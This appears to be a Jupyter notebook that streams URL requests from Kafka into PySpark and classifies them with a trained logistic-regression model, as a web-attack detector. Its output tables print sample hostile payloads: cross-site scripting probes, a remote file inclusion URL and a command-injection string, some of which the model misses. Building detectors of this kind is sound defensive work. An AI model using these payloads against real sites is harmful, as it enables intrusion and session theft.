# Requirements 

## Pip Install - findspark + confluent-kafka

In [1]:
!pip install findspark
!pip install confluent-kafka

    100% |████████████████████████████████| 2.7MB 3.5MB/s ta 0:00:01


## Download - Spark Project External Kafka Assembly

In [2]:
!wget https://repo1.maven.org/maven2/org/apache/spark/spark-streaming-kafka-0-8-assembly_2.11/2.4.0/spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar

--2021-04-03 19:46:58--  https://repo1.maven.org/maven2/org/apache/spark/spark-streaming-kafka-0-8-assembly_2.11/2.4.0/spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar
Resolving repo1.maven.org (repo1.maven.org)... 151.101.112.209
Connecting to repo1.maven.org (repo1.maven.org)|151.101.112.209|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13385346 (13M) [application/java-archive]
Saving to: ‘spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar’

spark-streaming-kaf 100%[===================>]  12.76M  5.21MB/s    in 2.5s    

2021-04-03 19:47:00 (5.21 MB/s) - ‘spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar’ saved [13385346/13385346]



## imports

In [3]:
import os
import findspark
findspark.init('/usr/local/spark/spark-2.4.0-bin-hadoop2.7')
os.environ['PYSPARK_SUBMIT_ARGS'] = '--jars spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar pyspark-shell'

In [4]:
import pyspark
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql import SQLContext, Row
from pyspark.sql.types import StructType, StructField, DoubleType, StringType, IntegerType
from pyspark.sql.functions import udf
from pyspark.ml.feature import CountVectorizerModel, IDFModel, StandardScalerModel, Tokenizer
from pyspark.ml.classification import LogisticRegressionModel
from pyspark.streaming.kafka import KafkaUtils
from urllib.parse import unquote

#Set spark configuration
APP_NAME = "BigData"
conf = pyspark.SparkConf().setAll([ ('spark.app.name', APP_NAME),
                                    ('spark.executor.memory', '8g'),
                                    ('spark.cores.max', '2'),
                                    ('spark.driver.memory','8g'),
                                    ('spark.master', 'local[2]')])
sc = SparkContext(conf=conf)
sqlc = SQLContext(sc)
sc


<SparkContext master=local[2] appName=BigData>

## payload to ngram function

In [5]:
def to_ngram(payload_obj):
    n=2
    payload = str(payload_obj)
    ngrams = ''
    for i in range(0,len(payload)-n + 1):
        ngrams += payload[i:i+n]+ ' '
    return ngrams[:-1]

ngrams = udf(to_ngram, StringType())
tokenizer = Tokenizer.load('../models/Tokenizer')
vectorizer = CountVectorizerModel.load('../models/Vectorizer')
idf_model = IDFModel.load('../models/idf')
scalerModel = StandardScalerModel.load('../models/scalerModel')
model = LogisticRegressionModel.load('../models/Logistic_Regression_Model')


topic = "test"
brokers = "localhost:9092"
ssc = StreamingContext(sc, batchDuration= 3)
kvs = KafkaUtils.createDirectStream(ssc, [topic], {"metadata.broker.list": brokers})


print("all setup - ready to run")

all setup - ready to run


## queries get predictions  

In [7]:
def get_prediction(queries):

    try:
        queries = queries.map(lambda w: Row(payload=w))
        queries = sqlc.createDataFrame(queries)
        queries = queries.withColumn('ngrams', ngrams(queries['payload']))
        queries = tokenizer.transform(queries)
        queries = vectorizer.transform(queries)
        queries = idf_model.transform(queries)
        queries = scalerModel.transform(queries)
        preds = model.transform(queries)
        preds.select('payload','prediction').show(truncate=False)
    except : 
        print('No data')

## start streaming

In [8]:
queries = kvs.map(lambda x: unquote(x[1]))
# ngrams = queries.map(lambda x: to_ngram(x))
queries.foreachRDD(get_prediction)


ssc.start()
ssc.awaitTermination()  

No data
No data
No data
No data
No data
No data
No data
+--------------------------------------+----------+
|payload                               |prediction|
+--------------------------------------+----------+
|/tagarela 1/                          |0.0       |
|/realplayer10/                        |0.0       |
|/6404573/                             |0.0       |
|/000023953/                           |0.0       |
|/_mocks/                              |0.0       |
|/javascript/oaerrordetailpage.svn-base|0.0       |
|/041440/                              |0.0       |
|/mgnews/                              |0.0       |
|/123004/                              |0.0       |
|/nettoys/                             |0.0       |
|/flag_japan/                          |0.0       |
|/666865/                              |0.0       |
|/136421/                              |0.0       |
|/javascript/todo.trace                |0.0       |
|/directory_com-coo/                   |0.0       |
|/seagat

+-------------------------------------------------------------------------------+----------+
|payload                                                                        |prediction|
+-------------------------------------------------------------------------------+----------+
|/?<script>document.cookie="testqppc=8767;"</script>                            |1.0       |
|/gpb/include/gpb.inc.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm??|0.0       |
|/en-us/jnv890lt.cfm?<script>cross_site_scripting.nasl</script>                 |1.0       |
|/w32rbotaqs/                                                                   |0.0       |
|/javascript/7z.xml                                                             |0.0       |
|/107845/                                                                       |0.0       |
|/design6/                                                                      |0.0       |
|/051318/                                                             

+---------------------------------------------------------+----------+
|payload                                                  |prediction|
+---------------------------------------------------------+----------+
|/javascript/properties.o                                 |0.0       |
|/greenday - wake me up when september ends video/        |0.0       |
|/iraq-102/                                               |0.0       |
|/124736/                                                 |0.0       |
|/t14433/                                                 |0.0       |
|/rv98iwjp.php3?<script>cross_site_scripting.nasl</script>|1.0       |
|/javascript/iphone.rhtml                                 |0.0       |
|/blogdetails-1434/                                       |0.0       |
|/flag_sea/                                               |0.0       |
|/tenchu/                                                 |0.0       |
+---------------------------------------------------------+----------+

+----

+------------------------------------------------------------------+----------+
|payload                                                           |prediction|
+------------------------------------------------------------------+----------+
|/javascript/intro.ws                                              |0.0       |
|/techmedia/                                                       |0.0       |
|/xsqln7eb.fts?<meta http-equiv=set-cookie content="testpcbb=9254">|1.0       |
|/javascript/uploader.cc                                           |0.0       |
|/hellometro_bot/                                                  |0.0       |
|/firewall-dvdrip/                                                 |0.0       |
|/049932/                                                          |0.0       |
|/713214/                                                          |0.0       |
|/2267124430093846955idowck_th/                                    |0.0       |
|/141853/                               

+---------------------------------------------------------------------+----------+
|payload                                                              |prediction|
+---------------------------------------------------------------------+----------+
|/javascript/sysuser.rar                                              |0.0       |
|/javascript/intra.tpl                                                |0.0       |
|/javabean/                                                           |0.0       |
|/signer/final.php?smiley=http://192.168.202.118:8080/moclyxlwqyfjnp??|0.0       |
|/002434/                                                             |0.0       |
|/contact-o/                                                          |0.0       |
|/lib/classes/swift/characterreaderfactory.php                        |0.0       |
|/star fox command_information/                                       |0.0       |
|/154981/                                                             |0.0       |
|/ap

+------------------------+----------+
|payload                 |prediction|
+------------------------+----------+
|/javascript/cpadmin.html|0.0       |
|/study_journalis/       |0.0       |
|/capitalista/           |0.0       |
|/2984839-1/             |0.0       |
|/priestley_gifts/       |0.0       |
|/swordsearcher-setup/   |0.0       |
|/tn_4365/               |0.0       |
|/tpolicy-press/         |0.0       |
|/akkred/                |0.0       |
|/igcsis-en/             |0.0       |
+------------------------+----------+

+-------------------------+----------+
|payload                  |prediction|
+-------------------------+----------+
|/squawkblog/             |0.0       |
|/topo_7/                 |0.0       |
|/javascript/signon.pl    |0.0       |
|/imgdetailsarrow/        |0.0       |
|/siteman_1/              |0.0       |
|/javascript/purchases.xsl|0.0       |
|/000420d726/             |0.0       |
|/151746/                 |0.0       |
|/ic_beijing/             |0.0       |

+---------------------------------+----------+
|payload                          |prediction|
+---------------------------------+----------+
|/top.php?stuff=\x0arm q48279772 #|0.0       |
|/pe-cals/                        |0.0       |
|/javascript/standards.xls        |0.0       |
|/opleidingen/                    |0.0       |
|/profcidao/                      |0.0       |
|/553533/                         |0.0       |
|/431991/                         |0.0       |
|/110568/                         |0.0       |
|/log2002m11/                     |0.0       |
|/1462243730075034447vsbwxd/      |0.0       |
+---------------------------------+----------+

+-------------------------------------------+----------+
|payload                                    |prediction|
+-------------------------------------------+----------+
|/200701021508ns3557009221/                 |0.0       |
|/midbox/                                   |0.0       |
|/horse-race_gifts/                         |0.0       |

+--------------------------------------------------+----------+
|payload                                           |prediction|
+--------------------------------------------------+----------+
|/saishook/                                        |0.0       |
|/mylistmate/                                      |0.0       |
|/20040731-2/                                      |0.0       |
|/wintoolscl/                                      |0.0       |
|/824641/                                          |0.0       |
|<script>/* *\x2A/javascript:alert(1)// */</script>|1.0       |
|/offerprintsupp/                                  |0.0       |
|/8742_taboff/                                     |0.0       |
|/medcalc_v8/                                      |0.0       |
|/nfl_tickets/                                     |0.0       |
+--------------------------------------------------+----------+

+--------------------------------------------------------------------------------------------------+---

KeyboardInterrupt: 